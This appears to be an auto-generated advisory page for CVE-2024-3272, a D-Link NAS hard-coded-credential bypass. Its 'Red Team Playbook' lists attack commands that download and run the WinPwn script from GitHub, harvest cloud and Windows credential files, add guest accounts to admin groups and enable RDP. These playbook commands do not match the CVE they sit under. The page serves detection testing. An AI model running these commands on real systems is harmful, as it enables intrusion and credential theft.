CVE-2024-3272
Overview
This vulnerability is an authentication bypass caused by hard-coded credentials embedded within the HTTP GET request handler component of D-Link DNS-320L and related models. The flaw arises from improper handling of the 'user' parameter in the /cgi-bin/nas_sharing.cgi endpoint, which allows an attacker to supply a specific input value leading to unauthorized access. The root cause is the presence of static credentials triggered by crafted HTTP requests, affecting the NAS device firmware versions up to 20240403.
Vulnerability Description
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
Impact
An attacker can remotely gain unauthorized administrative access to affected D-Link NAS devices without any authentication or user interaction. This access enables execution of arbitrary commands, potentially leading to full system compromise, data exfiltration, or lateral movement within a network. Because the exploit requires only a crafted HTTP request, it can be initiated from anywhere with network access to the device, posing a critical risk to confidentiality, integrity, and availability of data stored on the device.
Solution
Since the affected D-Link DNS-320L and related models are end-of-life and unsupported, the vendor recommends retiring and replacing these devices. No patches or firmware updates are available to remediate this vulnerability. For detailed information, consult the advisory at https://vuldb.com/?id.259283 and the vendor's end-of-life confirmation notices. Network administrators should isolate or decommission these devices to mitigate exposure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in several D-Link network-attached storage devices, specifically affecting the HTTP GET Request Handler component. This issue arises from improper handling of user input in the file responsible for NAS sharing, which can be exploited to reveal hard-coded credentials. The flaw is particularly concerning as it allows remote attackers to manipulate the input argument, potentially leading to unauthorized access to sensitive data stored on the affected devices. The severity of this vulnerability is underscored by its high CVSS score, indicating that it poses a significant risk to users still operating these outdated systems.
The attack vector for this vulnerability is primarily remote, meaning that an attacker does not need physical access to the device to exploit it. By crafting a specific HTTP GET request that targets the vulnerable component, an attacker can extract hard-coded credentials embedded within the system. This exploitation could lead to a variety of malicious activities, including unauthorized data access, data manipulation, or even the complete takeover of the affected devices. Given that the vulnerability affects multiple models of D-Link NAS devices, the potential for widespread exploitation is significant, especially among users who may not be aware of the risks associated with using unsupported hardware.
In terms of real-world impact, the implications of this vulnerability are severe for businesses and individuals alike. Organizations relying on these devices for data storage and sharing may find themselves at risk of data breaches, which can lead to financial loss, reputational damage, and legal repercussions. The exposure of sensitive information can compromise customer trust and result in regulatory fines, particularly if personal data is involved. Furthermore, the fact that these products are no longer supported by the vendor exacerbates the risk, as users will not receive patches or updates to mitigate the vulnerability, leaving them vulnerable to ongoing threats.
To detect and mitigate the risks associated with this vulnerability, organizations should first conduct a thorough inventory of their network-attached storage devices to identify any that are affected. Regular security assessments and vulnerability scans can help in identifying potential weaknesses within the network. For those using the impacted D-Link models, the most effective mitigation strategy is to replace these devices with supported alternatives that receive regular security updates. Additionally, implementing network segmentation can help limit the exposure of sensitive data and reduce the attack surface for potential intruders. Organizations should also consider employing intrusion detection systems to monitor for unusual activity that may indicate an attempted exploitation of this vulnerability.
In conclusion, the vulnerability affecting D-Link NAS devices represents a significant threat to users still operating these outdated systems. The potential for remote exploitation, coupled with the severe consequences of unauthorized access to sensitive data, necessitates immediate action from affected users. By prioritizing detection and mitigation strategies, organizations can protect their data and maintain their security posture in an increasingly hostile cyber landscape.
Affected Products (23)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dns-320l Firmware | 1.01.0702.2013 |
cpe:2.3:o:dlink:dns-320l_firmware:1.01.0702.2013:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320l Firmware | 1.03.0904.2013 |
cpe:2.3:o:dlink:dns-320l_firmware:1.03.0904.2013:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320l Firmware | 1.11 |
cpe:2.3:o:dlink:dns-320l_firmware:1.11:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-120 Firmware | N/A |
cpe:2.3:o:dlink:dns-120_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dnr-202l Firmware | N/A |
cpe:2.3:o:dlink:dnr-202l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-315l Firmware | N/A |
cpe:2.3:o:dlink:dns-315l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320 Firmware | N/A |
cpe:2.3:o:dlink:dns-320_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320lw Firmware | N/A |
cpe:2.3:o:dlink:dns-320lw_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-321 Firmware | N/A |
cpe:2.3:o:dlink:dns-321_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dnr-322l Firmware | N/A |
cpe:2.3:o:dlink:dnr-322l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-323 Firmware | N/A |
cpe:2.3:o:dlink:dns-323_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-325 Firmware | 1.01 |
cpe:2.3:o:dlink:dns-325_firmware:1.01:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-326 Firmware | N/A |
cpe:2.3:o:dlink:dns-326_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-327l Firmware | 1.00.0409.2013 |
cpe:2.3:o:dlink:dns-327l_firmware:1.00.0409.2013:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-327l Firmware | 1.09 |
cpe:2.3:o:dlink:dns-327l_firmware:1.09:*:*:*:*:*:*:*
|
|
|
Dlink | Dnr-326 Firmware | N/A |
cpe:2.3:o:dlink:dnr-326_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-340l Firmware | 1.08 |
cpe:2.3:o:dlink:dns-340l_firmware:1.08:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-343 Firmware | N/A |
cpe:2.3:o:dlink:dns-343_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-345 Firmware | N/A |
cpe:2.3:o:dlink:dns-345_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-726-4 Firmware | N/A |
cpe:2.3:o:dlink:dns-726-4_firmware:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
aliask/dinkleberry
Patch your D-Link device affected by CVE-2024-3272
|
aliask | 3 | 0 | 2024-05-21 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-70 | Try Common or Default Usernames and Passwords |
35%
|
Medium | High | |
| CAPEC-191 | Read Sensitive Constants Within an Executable |
33%
|
— | Low |
Red Team Playbook
36 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3272 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.259283 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.259283 |
| github.com |
GitHub CVE
exploit
|
https://github.com/netsecfish/dlink |
| supportannouncement.us.dlink.com |
GitHub CVE
related
|
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-3272 |